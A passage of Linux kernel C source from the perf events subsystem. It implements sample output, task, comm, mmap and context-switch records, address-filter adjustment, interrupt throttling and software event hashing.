data->regs_user.regs);
/*
* If there is something to dump, add space for the dump
* itself and for the field that tells the dynamic size,
* which is how many have been actually dumped.
*/
if (stack_size)
size += sizeof(u64) + stack_size;
data->stack_user_size = stack_size;
header->size += size;
}
if (sample_type & PERF_SAMPLE_REGS_INTR) {
/* regs dump ABI info */
int size = sizeof(u64);
perf_sample_regs_intr(&data->regs_intr, regs);
if (data->regs_intr.regs) {
u64 mask = event->attr.sample_regs_intr;
size += hweight64(mask) * sizeof(u64);
}
header->size += size;
}
}
static void __always_inline
__perf_event_output(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs,
int (*output_begin)(struct perf_output_handle *,
struct perf_event *,
unsigned int))
{
struct perf_output_handle handle;
struct perf_event_header header;
/* protect the callchain buffers */
rcu_read_lock();
perf_prepare_sample(&header, data, event, regs);
if (output_begin(&handle, event, header.size))
goto exit;
perf_output_sample(&handle, &header, data, event);
perf_output_end(&handle);
exit:
rcu_read_unlock();
}
void
perf_event_output_forward(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
__perf_event_output(event, data, regs, perf_output_begin_forward);
}
void
perf_event_output_backward(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
__perf_event_output(event, data, regs, perf_output_begin_backward);
}
void
perf_event_output(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
__perf_event_output(event, data, regs, perf_output_begin);
}
/*
* read event_id
*/
struct perf_read_event {
struct perf_event_header header;
u32 pid;
u32 tid;
};
static void
perf_event_read_event(struct perf_event *event,
struct task_struct *task)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
struct perf_read_event read_event = {
.header = {
.type = PERF_RECORD_READ,
.misc = 0,
.size = sizeof(read_event) + event->read_size,
},
.pid = perf_event_pid(event, task),
.tid = perf_event_tid(event, task),
};
int ret;
perf_event_header__init_id(&read_event.header, &sample, event);
ret = perf_output_begin(&handle, event, read_event.header.size);
if (ret)
return;
perf_output_put(&handle, read_event);
perf_output_read(&handle, event);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
typedef void (perf_iterate_f)(struct perf_event *event, void *data);
static void
perf_iterate_ctx(struct perf_event_context *ctx,
perf_iterate_f output,
void *data, bool all)
{
struct perf_event *event;
list_for_each_entry_rcu(event, &ctx->event_list, event_entry) {
if (!all) {
if (event->state < PERF_EVENT_STATE_INACTIVE)
continue;
if (!event_filter_match(event))
continue;
}
output(event, data);
}
}
static void perf_iterate_sb_cpu(perf_iterate_f output, void *data)
{
struct pmu_event_list *pel = this_cpu_ptr(&pmu_sb_events);
struct perf_event *event;
list_for_each_entry_rcu(event, &pel->list, sb_list) {
/*
* Skip events that are not fully formed yet; ensure that
* if we observe event->ctx, both event and ctx will be
* complete enough. See perf_install_in_context().
*/
if (!smp_load_acquire(&event->ctx))
continue;
if (event->state < PERF_EVENT_STATE_INACTIVE)
continue;
if (!event_filter_match(event))
continue;
output(event, data);
}
}
/*
* Iterate all events that need to receive side-band events.
*
* For new callers; ensure that account_pmu_sb_event() includes
* your event, otherwise it might not get delivered.
*/
static void
perf_iterate_sb(perf_iterate_f output, void *data,
struct perf_event_context *task_ctx)
{
struct perf_event_context *ctx;
int ctxn;
rcu_read_lock();
preempt_disable();
/*
* If we have task_ctx != NULL we only notify the task context itself.
* The task_ctx is set only for EXIT events before releasing task
* context.
*/
if (task_ctx) {
perf_iterate_ctx(task_ctx, output, data, false);
goto done;
}
perf_iterate_sb_cpu(output, data);
for_each_task_context_nr(ctxn) {
ctx = rcu_dereference(current->perf_event_ctxp[ctxn]);
if (ctx)
perf_iterate_ctx(ctx, output, data, false);
}
done:
preempt_enable();
rcu_read_unlock();
}
/*
* Clear all file-based filters at exec, they'll have to be
* re-instated when/if these objects are mmapped again.
*/
static void perf_event_addr_filters_exec(struct perf_event *event, void *data)
{
struct perf_addr_filters_head *ifh = perf_event_addr_filters(event);
struct perf_addr_filter *filter;
unsigned int restart = 0, count = 0;
unsigned long flags;
if (!has_addr_filter(event))
return;
raw_spin_lock_irqsave(&ifh->lock, flags);
list_for_each_entry(filter, &ifh->list, entry) {
if (filter->inode) {
event->addr_filters_offs[count] = 0;
restart++;
}
count++;
}
if (restart)
event->addr_filters_gen++;
raw_spin_unlock_irqrestore(&ifh->lock, flags);
if (restart)
perf_event_stop(event, 1);
}
void perf_event_exec(void)
{
struct perf_event_context *ctx;
int ctxn;
rcu_read_lock();
for_each_task_context_nr(ctxn) {
ctx = current->perf_event_ctxp[ctxn];
if (!ctx)
continue;
perf_event_enable_on_exec(ctxn);
perf_iterate_ctx(ctx, perf_event_addr_filters_exec, NULL,
true);
}
rcu_read_unlock();
}
struct remote_output {
struct ring_buffer *rb;
int err;
};
static void __perf_event_output_stop(struct perf_event *event, void *data)
{
struct perf_event *parent = event->parent;
struct remote_output *ro = data;
struct ring_buffer *rb = ro->rb;
struct stop_event_data sd = {
.event = event,
};
if (!has_aux(event))
return;
if (!parent)
parent = event;
/*
* In case of inheritance, it will be the parent that links to the
* ring-buffer, but it will be the child that's actually using it.
*
* We are using event::rb to determine if the event should be stopped,
* however this may race with ring_buffer_attach() (through set_output),
* which will make us skip the event that actually needs to be stopped.
* So ring_buffer_attach() has to stop an aux event before re-assigning
* its rb pointer.
*/
if (rcu_dereference(parent->rb) == rb)
ro->err = __perf_event_stop(&sd);
}
static int __perf_pmu_output_stop(void *info)
{
struct perf_event *event = info;
struct pmu *pmu = event->pmu;
struct perf_cpu_context *cpuctx = this_cpu_ptr(pmu->pmu_cpu_context);
struct remote_output ro = {
.rb = event->rb,
};
rcu_read_lock();
perf_iterate_ctx(&cpuctx->ctx, __perf_event_output_stop, &ro, false);
if (cpuctx->task_ctx)
perf_iterate_ctx(cpuctx->task_ctx, __perf_event_output_stop,
&ro, false);
rcu_read_unlock();
return ro.err;
}
static void perf_pmu_output_stop(struct perf_event *event)
{
struct perf_event *iter;
int err, cpu;
restart:
rcu_read_lock();
list_for_each_entry_rcu(iter, &event->rb->event_list, rb_entry) {
/*
* For per-CPU events, we need to make sure that neither they
* nor their children are running; for cpu==-1 events it's
* sufficient to stop the event itself if it's active, since
* it can't have children.
*/
cpu = iter->cpu;
if (cpu == -1)
cpu = READ_ONCE(iter->oncpu);
if (cpu == -1)
continue;
err = cpu_function_call(cpu, __perf_pmu_output_stop, event);
if (err == -EAGAIN) {
rcu_read_unlock();
goto restart;
}
}
rcu_read_unlock();
}
/*
* task tracking -- fork/exit
*
* enabled by: attr.comm | attr.mmap | attr.mmap2 | attr.mmap_data | attr.task
*/
struct perf_task_event {
struct task_struct *task;
struct perf_event_context *task_ctx;
struct {
struct perf_event_header header;
u32 pid;
u32 ppid;
u32 tid;
u32 ptid;
u64 time;
} event_id;
};
static int perf_event_task_match(struct perf_event *event)
{
return event->attr.comm || event->attr.mmap ||
event->attr.mmap2 || event->attr.mmap_data ||
event->attr.task;
}
static void perf_event_task_output(struct perf_event *event,
void *data)
{
struct perf_task_event *task_event = data;
struct perf_output_handle handle;
struct perf_sample_data sample;
struct task_struct *task = task_event->task;
int ret, size = task_event->event_id.header.size;
if (!perf_event_task_match(event))
return;
perf_event_header__init_id(&task_event->event_id.header, &sample, event);
ret = perf_output_begin(&handle, event,
task_event->event_id.header.size);
if (ret)
goto out;
task_event->event_id.pid = perf_event_pid(event, task);
task_event->event_id.ppid = perf_event_pid(event, current);
task_event->event_id.tid = perf_event_tid(event, task);
task_event->event_id.ptid = perf_event_tid(event, current);
task_event->event_id.time = perf_event_clock(event);
perf_output_put(&handle, task_event->event_id);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
out:
task_event->event_id.header.size = size;
}
static void perf_event_task(struct task_struct *task,
struct perf_event_context *task_ctx,
int new)
{
struct perf_task_event task_event;
if (!atomic_read(&nr_comm_events) &&
!atomic_read(&nr_mmap_events) &&
!atomic_read(&nr_task_events))
return;
task_event = (struct perf_task_event){
.task = task,
.task_ctx = task_ctx,
.event_id = {
.header = {
.type = new ? PERF_RECORD_FORK : PERF_RECORD_EXIT,
.misc = 0,
.size = sizeof(task_event.event_id),
},
/* .pid */
/* .ppid */
/* .tid */
/* .ptid */
/* .time */
},
};
perf_iterate_sb(perf_event_task_output,
&task_event,
task_ctx);
}
void perf_event_fork(struct task_struct *task)
{
perf_event_task(task, NULL, 1);
}
/*
* comm tracking
*/
struct perf_comm_event {
struct task_struct *task;
char *comm;
int comm_size;
struct {
struct perf_event_header header;
u32 pid;
u32 tid;
} event_id;
};
static int perf_event_comm_match(struct perf_event *event)
{
return event->attr.comm;
}
static void perf_event_comm_output(struct perf_event *event,
void *data)
{
struct perf_comm_event *comm_event = data;
struct perf_output_handle handle;
struct perf_sample_data sample;
int size = comm_event->event_id.header.size;
int ret;
if (!perf_event_comm_match(event))
return;
perf_event_header__init_id(&comm_event->event_id.header, &sample, event);
ret = perf_output_begin(&handle, event,
comm_event->event_id.header.size);
if (ret)
goto out;
comm_event->event_id.pid = perf_event_pid(event, comm_event->task);
comm_event->event_id.tid = perf_event_tid(event, comm_event->task);
perf_output_put(&handle, comm_event->event_id);
__output_copy(&handle, comm_event->comm,
comm_event->comm_size);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
out:
comm_event->event_id.header.size = size;
}
static void perf_event_comm_event(struct perf_comm_event *comm_event)
{
char comm[TASK_COMM_LEN];
unsigned int size;
memset(comm, 0, sizeof(comm));
strlcpy(comm, comm_event->task->comm, sizeof(comm));
size = ALIGN(strlen(comm)+1, sizeof(u64));
comm_event->comm = comm;
comm_event->comm_size = size;
comm_event->event_id.header.size = sizeof(comm_event->event_id) + size;
perf_iterate_sb(perf_event_comm_output,
comm_event,
NULL);
}
void perf_event_comm(struct task_struct *task, bool exec)
{
struct perf_comm_event comm_event;
if (!atomic_read(&nr_comm_events))
return;
comm_event = (struct perf_comm_event){
.task = task,
/* .comm */
/* .comm_size */
.event_id = {
.header = {
.type = PERF_RECORD_COMM,
.misc = exec ? PERF_RECORD_MISC_COMM_EXEC : 0,
/* .size */
},
/* .pid */
/* .tid */
},
};
perf_event_comm_event(&comm_event);
}
/*
* mmap tracking
*/
struct perf_mmap_event {
struct vm_area_struct *vma;
const char *file_name;
int file_size;
int maj, min;
u64 ino;
u64 ino_generation;
u32 prot, flags;
struct {
struct perf_event_header header;
u32 pid;
u32 tid;
u64 start;
u64 len;
u64 pgoff;
} event_id;
};
static int perf_event_mmap_match(struct perf_event *event,
void *data)
{
struct perf_mmap_event *mmap_event = data;
struct vm_area_struct *vma = mmap_event->vma;
int executable = vma->vm_flags & VM_EXEC;
return (!executable && event->attr.mmap_data) ||
(executable && (event->attr.mmap || event->attr.mmap2));
}
static void perf_event_mmap_output(struct perf_event *event,
void *data)
{
struct perf_mmap_event *mmap_event = data;
struct perf_output_handle handle;
struct perf_sample_data sample;
int size = mmap_event->event_id.header.size;
int ret;
if (!perf_event_mmap_match(event, data))
return;
if (event->attr.mmap2) {
mmap_event->event_id.header.type = PERF_RECORD_MMAP2;
mmap_event->event_id.header.size += sizeof(mmap_event->maj);
mmap_event->event_id.header.size += sizeof(mmap_event->min);
mmap_event->event_id.header.size += sizeof(mmap_event->ino);
mmap_event->event_id.header.size += sizeof(mmap_event->ino_generation);
mmap_event->event_id.header.size += sizeof(mmap_event->prot);
mmap_event->event_id.header.size += sizeof(mmap_event->flags);
}
perf_event_header__init_id(&mmap_event->event_id.header, &sample, event);
ret = perf_output_begin(&handle, event,
mmap_event->event_id.header.size);
if (ret)
goto out;
mmap_event->event_id.pid = perf_event_pid(event, current);
mmap_event->event_id.tid = perf_event_tid(event, current);
perf_output_put(&handle, mmap_event->event_id);
if (event->attr.mmap2) {
perf_output_put(&handle, mmap_event->maj);
perf_output_put(&handle, mmap_event->min);
perf_output_put(&handle, mmap_event->ino);
perf_output_put(&handle, mmap_event->ino_generation);
perf_output_put(&handle, mmap_event->prot);
perf_output_put(&handle, mmap_event->flags);
}
__output_copy(&handle, mmap_event->file_name,
mmap_event->file_size);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
out:
mmap_event->event_id.header.size = size;
}
static void perf_event_mmap_event(struct perf_mmap_event *mmap_event)
{
struct vm_area_struct *vma = mmap_event->vma;
struct file *file = vma->vm_file;
int maj = 0, min = 0;
u64 ino = 0, gen = 0;
u32 prot = 0, flags = 0;
unsigned int size;
char tmp[16];
char *buf = NULL;
char *name;
if (vma->vm_flags & VM_READ)
prot |= PROT_READ;
if (vma->vm_flags & VM_WRITE)
prot |= PROT_WRITE;
if (vma->vm_flags & VM_EXEC)
prot |= PROT_EXEC;
if (vma->vm_flags & VM_MAYSHARE)
flags = MAP_SHARED;
else
flags = MAP_PRIVATE;
if (vma->vm_flags & VM_DENYWRITE)
flags |= MAP_DENYWRITE;
if (vma->vm_flags & VM_MAYEXEC)
flags |= MAP_EXECUTABLE;
if (vma->vm_flags & VM_LOCKED)
flags |= MAP_LOCKED;
if (vma->vm_flags & VM_HUGETLB)
flags |= MAP_HUGETLB;
if (file) {
struct inode *inode;
dev_t dev;
buf = kmalloc(PATH_MAX, GFP_KERNEL);
if (!buf) {
name = "//enomem";
goto cpy_name;
}
/*
* d_path() works from the end of the rb backwards, so we
* need to add enough zero bytes after the string to handle
* the 64bit alignment we do later.
*/
name = file_path(file, buf, PATH_MAX - sizeof(u64));
if (IS_ERR(name)) {
name = "//toolong";
goto cpy_name;
}
inode = file_inode(vma->vm_file);
dev = inode->i_sb->s_dev;
ino = inode->i_ino;
gen = inode->i_generation;
maj = MAJOR(dev);
min = MINOR(dev);
goto got_name;
} else {
if (vma->vm_ops && vma->vm_ops->name) {
name = (char *) vma->vm_ops->name(vma);
if (name)
goto cpy_name;
}
name = (char *)arch_vma_name(vma);
if (name)
goto cpy_name;
if (vma->vm_start <= vma->vm_mm->start_brk &&
vma->vm_end >= vma->vm_mm->brk) {
name = "[heap]";
goto cpy_name;
}
if (vma->vm_start <= vma->vm_mm->start_stack &&
vma->vm_end >= vma->vm_mm->start_stack) {
name = "[stack]";
goto cpy_name;
}
name = "//anon";
goto cpy_name;
}
cpy_name:
strlcpy(tmp, name, sizeof(tmp));
name = tmp;
got_name:
/*
* Since our buffer works in 8 byte units we need to align our string
* size to a multiple of 8. However, we must guarantee the tail end is
* zero'd out to avoid leaking random bits to userspace.
*/
size = strlen(name)+1;
while (!IS_ALIGNED(size, sizeof(u64)))
name[size++] = '\0';
mmap_event->file_name = name;
mmap_event->file_size = size;
mmap_event->maj = maj;
mmap_event->min = min;
mmap_event->ino = ino;
mmap_event->ino_generation = gen;
mmap_event->prot = prot;
mmap_event->flags = flags;
if (!(vma->vm_flags & VM_EXEC))
mmap_event->event_id.header.misc |= PERF_RECORD_MISC_MMAP_DATA;
mmap_event->event_id.header.size = sizeof(mmap_event->event_id) + size;
perf_iterate_sb(perf_event_mmap_output,
mmap_event,
NULL);
kfree(buf);
}
/*
* Check whether inode and address range match filter criteria.
*/
static bool perf_addr_filter_match(struct perf_addr_filter *filter,
struct file *file, unsigned long offset,
unsigned long size)
{
if (filter->inode != file_inode(file))
return false;
if (filter->offset > offset + size)
return false;
if (filter->offset + filter->size < offset)
return false;
return true;
}
static void __perf_addr_filters_adjust(struct perf_event *event, void *data)
{
struct perf_addr_filters_head *ifh = perf_event_addr_filters(event);
struct vm_area_struct *vma = data;
unsigned long off = vma->vm_pgoff << PAGE_SHIFT, flags;
struct file *file = vma->vm_file;
struct perf_addr_filter *filter;
unsigned int restart = 0, count = 0;
if (!has_addr_filter(event))
return;
if (!file)
return;
raw_spin_lock_irqsave(&ifh->lock, flags);
list_for_each_entry(filter, &ifh->list, entry) {
if (perf_addr_filter_match(filter, file, off,
vma->vm_end - vma->vm_start)) {
event->addr_filters_offs[count] = vma->vm_start;
restart++;
}
count++;
}
if (restart)
event->addr_filters_gen++;
raw_spin_unlock_irqrestore(&ifh->lock, flags);
if (restart)
perf_event_stop(event, 1);
}
/*
* Adjust all task's events' filters to the new vma
*/
static void perf_addr_filters_adjust(struct vm_area_struct *vma)
{
struct perf_event_context *ctx;
int ctxn;
/*
* Data tracing isn't supported yet and as such there is no need
* to keep track of anything that isn't related to executable code:
*/
if (!(vma->vm_flags & VM_EXEC))
return;
rcu_read_lock();
for_each_task_context_nr(ctxn) {
ctx = rcu_dereference(current->perf_event_ctxp[ctxn]);
if (!ctx)
continue;
perf_iterate_ctx(ctx, __perf_addr_filters_adjust, vma, true);
}
rcu_read_unlock();
}
void perf_event_mmap(struct vm_area_struct *vma)
{
struct perf_mmap_event mmap_event;
if (!atomic_read(&nr_mmap_events))
return;
mmap_event = (struct perf_mmap_event){
.vma = vma,
/* .file_name */
/* .file_size */
.event_id = {
.header = {
.type = PERF_RECORD_MMAP,
.misc = PERF_RECORD_MISC_USER,
/* .size */
},
/* .pid */
/* .tid */
.start = vma->vm_start,
.len = vma->vm_end - vma->vm_start,
.pgoff = (u64)vma->vm_pgoff << PAGE_SHIFT,
},
/* .maj (attr_mmap2 only) */
/* .min (attr_mmap2 only) */
/* .ino (attr_mmap2 only) */
/* .ino_generation (attr_mmap2 only) */
/* .prot (attr_mmap2 only) */
/* .flags (attr_mmap2 only) */
};
perf_addr_filters_adjust(vma);
perf_event_mmap_event(&mmap_event);
}
void perf_event_aux_event(struct perf_event *event, unsigned long head,
unsigned long size, u64 flags)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
struct perf_aux_event {
struct perf_event_header header;
u64 offset;
u64 size;
u64 flags;
} rec = {
.header = {
.type = PERF_RECORD_AUX,
.misc = 0,
.size = sizeof(rec),
},
.offset = head,
.size = size,
.flags = flags,
};
int ret;
perf_event_header__init_id(&rec.header, &sample, event);
ret = perf_output_begin(&handle, event, rec.header.size);
if (ret)
return;
perf_output_put(&handle, rec);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
/*
* Lost/dropped samples logging
*/
void perf_log_lost_samples(struct perf_event *event, u64 lost)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
int ret;
struct {
struct perf_event_header header;
u64 lost;
} lost_samples_event = {
.header = {
.type = PERF_RECORD_LOST_SAMPLES,
.misc = 0,
.size = sizeof(lost_samples_event),
},
.lost = lost,
};
perf_event_header__init_id(&lost_samples_event.header, &sample, event);
ret = perf_output_begin(&handle, event,
lost_samples_event.header.size);
if (ret)
return;
perf_output_put(&handle, lost_samples_event);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
/*
* context_switch tracking
*/
struct perf_switch_event {
struct task_struct *task;
struct task_struct *next_prev;
struct {
struct perf_event_header header;
u32 next_prev_pid;
u32 next_prev_tid;
} event_id;
};
static int perf_event_switch_match(struct perf_event *event)
{
return event->attr.context_switch;
}
static void perf_event_switch_output(struct perf_event *event, void *data)
{
struct perf_switch_event *se = data;
struct perf_output_handle handle;
struct perf_sample_data sample;
int ret;
if (!perf_event_switch_match(event))
return;
/* Only CPU-wide events are allowed to see next/prev pid/tid */
if (event->ctx->task) {
se->event_id.header.type = PERF_RECORD_SWITCH;
se->event_id.header.size = sizeof(se->event_id.header);
} else {
se->event_id.header.type = PERF_RECORD_SWITCH_CPU_WIDE;
se->event_id.header.size = sizeof(se->event_id);
se->event_id.next_prev_pid =
perf_event_pid(event, se->next_prev);
se->event_id.next_prev_tid =
perf_event_tid(event, se->next_prev);
}
perf_event_header__init_id(&se->event_id.header, &sample, event);
ret = perf_output_begin(&handle, event, se->event_id.header.size);
if (ret)
return;
if (event->ctx->task)
perf_output_put(&handle, se->event_id.header);
else
perf_output_put(&handle, se->event_id);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
static void perf_event_switch(struct task_struct *task,
struct task_struct *next_prev, bool sched_in)
{
struct perf_switch_event switch_event;
/* N.B. caller checks nr_switch_events != 0 */
switch_event = (struct perf_switch_event){
.task = task,
.next_prev = next_prev,
.event_id = {
.header = {
/* .type */
.misc = sched_in ? 0 : PERF_RECORD_MISC_SWITCH_OUT,
/* .size */
},
/* .next_prev_pid */
/* .next_prev_tid */
},
};
perf_iterate_sb(perf_event_switch_output,
&switch_event,
NULL);
}
/*
* IRQ throttle logging
*/
static void perf_log_throttle(struct perf_event *event, int enable)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
int ret;
struct {
struct perf_event_header header;
u64 time;
u64 id;
u64 stream_id;
} throttle_event = {
.header = {
.type = PERF_RECORD_THROTTLE,
.misc = 0,
.size = sizeof(throttle_event),
},
.time = perf_event_clock(event),
.id = primary_event_id(event),
.stream_id = event->id,
};
if (enable)
throttle_event.header.type = PERF_RECORD_UNTHROTTLE;
perf_event_header__init_id(&throttle_event.header, &sample, event);
ret = perf_output_begin(&handle, event,
throttle_event.header.size);
if (ret)
return;
perf_output_put(&handle, throttle_event);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
static void perf_log_itrace_start(struct perf_event *event)
{
struct perf_output_handle handle;
struct perf_sample_data sample;
struct perf_aux_event {
struct perf_event_header header;
u32 pid;
u32 tid;
} rec;
int ret;
if (event->parent)
event = event->parent;
if (!(event->pmu->capabilities & PERF_PMU_CAP_ITRACE) ||
event->hw.itrace_started)
return;
rec.header.type = PERF_RECORD_ITRACE_START;
rec.header.misc = 0;
rec.header.size = sizeof(rec);
rec.pid = perf_event_pid(event, current);
rec.tid = perf_event_tid(event, current);
perf_event_header__init_id(&rec.header, &sample, event);
ret = perf_output_begin(&handle, event, rec.header.size);
if (ret)
return;
perf_output_put(&handle, rec);
perf_event__output_id_sample(event, &handle, &sample);
perf_output_end(&handle);
}
static int
__perf_event_account_interrupt(struct perf_event *event, int throttle)
{
struct hw_perf_event *hwc = &event->hw;
int ret = 0;
u64 seq;
seq = __this_cpu_read(perf_throttled_seq);
if (seq != hwc->interrupts_seq) {
hwc->interrupts_seq = seq;
hwc->interrupts = 1;
} else {
hwc->interrupts++;
if (unlikely(throttle
&& hwc->interrupts >= max_samples_per_tick)) {
__this_cpu_inc(perf_throttled_count);
tick_dep_set_cpu(smp_processor_id(), TICK_DEP_BIT_PERF_EVENTS);
hwc->interrupts = MAX_INTERRUPTS;
perf_log_throttle(event, 0);
ret = 1;
}
}
if (event->attr.freq) {
u64 now = perf_clock();
s64 delta = now - hwc->freq_time_stamp;
hwc->freq_time_stamp = now;
if (delta > 0 && delta < 2*TICK_NSEC)
perf_adjust_period(event, delta, hwc->last_period, true);
}
return ret;
}
int perf_event_account_interrupt(struct perf_event *event)
{
return __perf_event_account_interrupt(event, 1);
}
/*
* Generic event overflow handling, sampling.
*/
static int __perf_event_overflow(struct perf_event *event,
int throttle, struct perf_sample_data *data,
struct pt_regs *regs)
{
int events = atomic_read(&event->event_limit);
int ret = 0;
/*
* Non-sampling counters might still use the PMI to fold short
* hardware counters, ignore those.
*/
if (unlikely(!is_sampling_event(event)))
return 0;
ret = __perf_event_account_interrupt(event, throttle);
/*
* XXX event_limit might not quite work as expected on inherited
* events
*/
event->pending_kill = POLL_IN;
if (events && atomic_dec_and_test(&event->event_limit)) {
ret = 1;
event->pending_kill = POLL_HUP;
perf_event_disable_inatomic(event);
}
READ_ONCE(event->overflow_handler)(event, data, regs);
if (*perf_event_fasync(event) && event->pending_kill) {
event->pending_wakeup = 1;
irq_work_queue(&event->pending);
}
return ret;
}
int perf_event_overflow(struct perf_event *event,
struct perf_sample_data *data,
struct pt_regs *regs)
{
return __perf_event_overflow(event, 1, data, regs);
}
/*
* Generic software event infrastructure
*/
struct swevent_htable {
struct swevent_hlist *swevent_hlist;
struct mutex hlist_mutex;
int hlist_refcount;
/* Recursion avoidance in each contexts */
int recursion[PERF_NR_CONTEXTS];
};
static DEFINE_PER_CPU(struct swevent_htable, swevent_htable);
/*
* We directly increment event->count and keep a second value in
* event->hw.period_left to count intervals. This period event
* is kept in the range [-sample_period, 0] so that we can use the
* sign as trigger.
*/
u64 perf_swevent_set_period(struct perf_event *event)
{
struct hw_perf_event *hwc = &event->hw;
u64 period = hwc->last_period;
u64 nr, offset;
s64 old, val;
hwc->last_period = hwc->sample_period;
again:
old = val = local64_read(&hwc->period_left);
if (val < 0)
return 0;
nr = div64_u64(period + val, period);
offset = nr * period;
val -= offset;
if (local64_cmpxchg(&hwc->period_left, old, val) != old)
goto again;
return nr;
}
static void perf_swevent_overflow(struct perf_event *event, u64 overflow,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct hw_perf_event *hwc = &event->hw;
int throttle = 0;
if (!overflow)
overflow = perf_swevent_set_period(event);
if (hwc->interrupts == MAX_INTERRUPTS)
return;
for (; overflow; overflow--) {
if (__perf_event_overflow(event, throttle,
data, regs)) {
/*
* We inhibit the overflow from happening when
* hwc->interrupts == MAX_INTERRUPTS.
*/
break;
}
throttle = 1;
}
}
static void perf_swevent_event(struct perf_event *event, u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct hw_perf_event *hwc = &event->hw;
local64_add(nr, &event->count);
if (!regs)
return;
if (!is_sampling_event(event))
return;
if ((event->attr.sample_type & PERF_SAMPLE_PERIOD) && !event->attr.freq) {
data->period = nr;
return perf_swevent_overflow(event, 1, data, regs);
} else
data->period = event->hw.last_period;
if (nr == 1 && hwc->sample_period == 1 && !event->attr.freq)
return perf_swevent_overflow(event, 1, data, regs);
if (local64_add_negative(nr, &hwc->period_left))
return;
perf_swevent_overflow(event, 0, data, regs);
}
static int perf_exclude_event(struct perf_event *event,
struct pt_regs *regs)
{
if (event->hw.state & PERF_HES_STOPPED)
return 1;
if (regs) {
if (event->attr.exclude_user && user_mode(regs))
return 1;
if (event->attr.exclude_kernel && !user_mode(regs))
return 1;
}
return 0;
}
static int perf_swevent_match(struct perf_event *event,
enum perf_type_id type,
u32 event_id,
struct perf_sample_data *data,
struct pt_regs *regs)
{
if (event->attr.type != type)
return 0;
if (event->attr.config != event_id)
return 0;
if (perf_exclude_event(event, regs))
return 0;
return 1;
}
static inline u64 swevent_hash(u64 type, u32 event_id)
{
u64 val = event_id | (type << 32);
return hash_64(val, SWEVENT_HLIST_BITS);
}
static inline struct hlist_head *
__find_swevent_head(struct swevent_hlist *hlist, u64 type, u32 event_id)
{
u64 hash = swevent_hash(type, event_id);
return &hlist->heads[hash];
}
/* For the read side: events when they trigger */
static inline struct hlist_head *
find_swevent_head_rcu(struct swevent_htable *swhash, u64 type, u32 event_id)
{
struct swevent_hlist *hlist;
hlist = rcu_dereference(swhash->swevent_hlist);
if (!hlist)
return NULL;
return __find_swevent_head(hlist, type, event_id);
}
/* For the event head insertion and removal in the hlist */
static inline struct hlist_head *
find_swevent_head(struct swevent_htable *swhash, struct perf_event *event)
{
struct swevent_hlist *hlist;
u32 event_id = event->attr.config;
u64 type = event->attr.type;
/*
* Event scheduling is always serialized against hlist allocation
* and release. Which makes the protected version suitable here.
* The context lock guarantees that.
*/
hlist = rcu_dereference_protected(swhash->swevent_hlist,
lockdep_is_held(&event->ctx->lock));
if (!hlist)
return NULL;
return __find_swevent_head(hlist, type, event_id);
}
static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct perf_event *event;
struct hlist_head *head;
rcu_read_lock();
head = find_swevent_head_rcu(swhash, type, event_id);
if (!head)
goto end;
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_swevent_match(event, type, event_id, data, regs))
perf_swevent_event(event, nr, data, regs);
}
end:
rcu_read_unlock();
}
DEFINE_PER_CPU(struct pt_regs, __perf_regs[4]);
int perf_swevent_get_recursion_context(void)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
return get_recursion_context(swhash->recursion);
}
EXPORT_SYMBOL_GPL(perf_swevent_get_recursion_context);
void perf_swevent_put_recursion_context(int rctx)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
put_recursion_context(swhash->recursion, rctx);
}
void ___perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)
{
struct perf_sample_data data;
if (WARN_ON_ONCE(!regs))
return;
perf_sample_data_init(&data, addr, 0);
do_perf_sw_event(PERF_TYPE_SOFTWARE, event_id, nr, &data, regs);
}
void __perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)
{
int rctx;
preempt_disable_notrace();
rctx = perf_swevent_get_recursion_context();
if (unlikely(rctx < 0))
goto fail;
___perf_sw_event(event_id, nr, regs, addr);
perf_swevent_put_recursion_context(rctx);
fail:
preempt_enable_notrace();
}
static void perf_swevent_read(struct perf_event *event)
{
}
static int perf_swevent_add(struct perf_event *event, int flags)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct hw_perf_event *hwc = &event->hw;
struct hlist_head *head;
if (is_sampling_event(event)) {
hwc->last_period = hwc->sample_period;
perf_swevent_set_period(event);
}
hwc->state = !(flags & PERF_EF_START);
head = find_swevent_head(swhash, event);
if (WARN_ON_ONCE(!head))
return -EINVAL;
hlist_add_head_rcu(&event->hlist_entry, head);
perf_event_update_userpage(event);
return 0;
}
static void perf_swevent_del(struct perf_event *event, int flags)
{
hlist_del_rcu(&event->hlist_entry);
}
static void perf_swevent_start(struct perf_event *event, int flags)
{
event->hw.state = 0;
}
static void perf_swevent_stop(struct perf_event *event, int flags)
{
event->hw.state = PERF_HES_STOPPED;
}
/* Deref the hlist from the update side */
static inline struct swevent_hlist *
swevent_hlist_deref(struct swevent_htable *swhash)
{
return rcu_dereference_protected(swhash->swevent_hlist,
lockdep_is_held(&swhash->hlist_mutex));
}
static void swevent_hlist_release(struct swevent_htable *swhash)
{
struct swevent_hlist *hlist = swevent_hlist_deref(swhash);
if (!hlist)
return;
